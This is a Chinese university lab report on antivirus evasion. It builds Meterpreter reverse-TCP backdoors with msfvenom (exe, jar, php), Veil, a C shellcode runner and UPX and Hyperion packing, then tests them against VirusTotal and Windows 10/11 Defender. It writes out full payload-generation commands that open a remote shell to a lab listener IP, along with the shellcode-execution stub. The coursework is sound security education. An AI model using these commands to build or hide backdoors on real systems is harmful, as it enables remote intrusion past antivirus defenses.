20232416 2025-2026-1 《网络与系统攻防技术》实验三实验报告
1.实验内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
- 正确使用msf编码器,使用msfvenom生成jar、php等文件
- veil,加壳工具
- 使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
(3)在杀软开启的情况下,用主机进行实测
2.实验目的
(1)以meterpreter为样本恶意软件,通过不同的免杀方式来测试免杀效果
(2)使用Shellcode并结合不同编码方式来实现后门程序的免杀,并测试是否能通过win11杀软的查杀功能。
3. 回答问题
(1)杀软是如何检测出恶意代码的?
杀软检测恶意代码主要通过多种技术组合实现,包括特征码检测,例如独特特征与特征库对比;行为分析,例如监控程序修改文件、读取键鼠等操作;启发式检测,例如对加壳、代码混淆等进行判断,综合这些方式识别并拦截恶意代码。
(2)免杀是做什么?
免杀是恶意代码开发者或攻击者,通过技术手段修改恶意代码,绕过杀软检测与拦截的过程。
(3)免杀的基本方法有哪些?
修改特征码、代码混淆与加壳、对抗行为分析等
4.实验过程
4.1 前期准备
首先查看kali虚拟机的ip地址,使用命令ifconfig
其次我们要下载veil免杀工具并且配置环境,使用指令sudo apt -y install veil下载veil工具
接下来使用命令usr/share/veil/config/setup.sh --force --silent进行变量配置
输入veil后可查看版本号类似于下图说明安装成功
4.2 获取参考基准,正确使用msfvenom生成jar、php等文件并且编码,查看免杀效果
利用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.46.128 LPORT=2416 -f exe > met_20232416.exe生成可执行文件
将该文件放入virustotal进行评价,发现检出率为43/71,将这个比例作为参照,查看后续的免杀技术效果。
将原.exe文件使用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.46.128 LPORT=2416 -f exe > met_10_20232416.exe编码10次
再次查看免杀效果
可以免杀效果很差,接下来我们生成.jar文件
利用指令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.46.128 LPORT=2416 x>met_jar_20232416.jar生成.jar文件
再利用指令msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.46.128 LPORT=2416 x>met_jar_10_20232416.jar生成一份经过编码10次的.jar文件
我们再次查看免杀效果
这次发现免杀效果有所下降,接下来我们生成.php文件
利用指令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.46.128 LPORT=2416 x> met_php_20232416.php生成.php文件。
利用指令msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.46.128 LPORT=2416 x> met_php_10_20222408.php生成经过10次编码的.php文件
此时我们再次查看免杀效果
可以看到免杀效果很好
4.3 使用veil免杀工具
在veil正确安装的前提下,输入use 1从而进入可选工具中的Evasion模块,再依次输入list、use 7后进入到配置接口,进行配置,获取生成的veil文件,命令如下:
set LHOST 192.168.46.128 #此处为虚拟机的ip
set LPORT 2416 #设置端口
generate
查看文件生成位置确定文件成功生成
上传virustotal进行评价,发现有一定的免杀效果
4.4 使用“Shellcode + C”编码
使用指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.46.128 LPORT=2416 -f c,用msfvenom工具来生成一个C语言编码的有效载荷
使用命令vi shellcode_c_20232416.c、i686-w64-mingw32-g++ shellcode_c_20232416.c -o shellcode_c_20232416.exe编译为可执行文件后,查看免杀效果发现基本不具备免杀效果
4.5 使用加壳工具
首先使用压缩壳upx,使用指令upx shellcode_c_20232416.exe -o shellcode_c_upx_20232416.exe,将之前生成的.exe文件添加压缩壳。
查看免杀效果后发现免杀效果略有下降
其次,复制一个之前生成的.exe文件放入正确的文件夹下,添加加密壳Hyperion
查看文件是否生成并查看免杀效果
免杀效果较之前下降更多,这说明这两种加壳方式已经被标记为高风险特征,会被系统重点检查反而更容易被检测出来
4.6 尝试通过双重加壳实现免杀功能
第一步生成攻击载荷,使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.46.128 LPORT=2416 -f c > 20232416_shellcode.c
使用命令vi 20232416_shellcode.c来编辑.c文件并加入main函数int main(){ int (*func)() = (int(*)())buf; func(); }
使用MinGW-w64编译.c文件并添加压缩壳、加密壳
传输到物理机上可以发现免杀效果较差
在win11上,我尝试开启杀软和不开启杀软运行该文件,可得到以下结果:
(1)无法运行后直接被杀掉(2)可以运行但是运行失败,或者说根本就没有运行。正常运行成功应该可以看到物理机的Powershell不会立即显示下一个命令行输入提示,即红框部分内容;并且应该可以看到kali虚拟机的控制台得到了反弹回来的物理机的Powershell,也可以正常输入命令。但此时我们都没有看到,说明这个恶意代码文件的免杀功能并未实现。(此时恶意代码文件是确实存在的,并未被杀死,使用命令ls可以查看到该文件)
在win10上,我尝试开启杀软和不开启杀软运行该文件,可得到以下结果:
说明这种加壳是无法实现免杀的,也更说明了现如今电脑系统的安全性愈发完善,防范性更高
5. 遇到的问题及解决方案
5.1 veil环境配置失败问题
在使用命令usr/share/veil/config/setup.sh --force --silent时出现如图问题:
经过查询得知,大概率联网问题,可能需要寻找其它源。我当时抱着试一试的心态重新运行了一遍,结果发现之前报错消失了,问题就这样戏剧性地解决了。
6. 实验感想
本次网络攻防实验的细节体验让我印象深刻。配置veil时,起初用usr/share/veil/config/setup.sh --force --silent报错,以为是联网或源的问题,重试后竟意外解决,这让我意识到实验中隐性因素的影响;测试免杀时,msfvenom 编码 10 次的.exe检出率仍高,而.php文件效果好,“Shellcode + C”加UPX、Hyperion壳后,免杀效果反而下降,才知常见工具已被杀软重点标记;Win11、Win10实测中,代码要么被杀软拦截,要么关闭杀软也运行失败,凸显系统防护升级。这些细节不仅提升了我的实操能力,更让我对攻防对抗有了更具体的认知。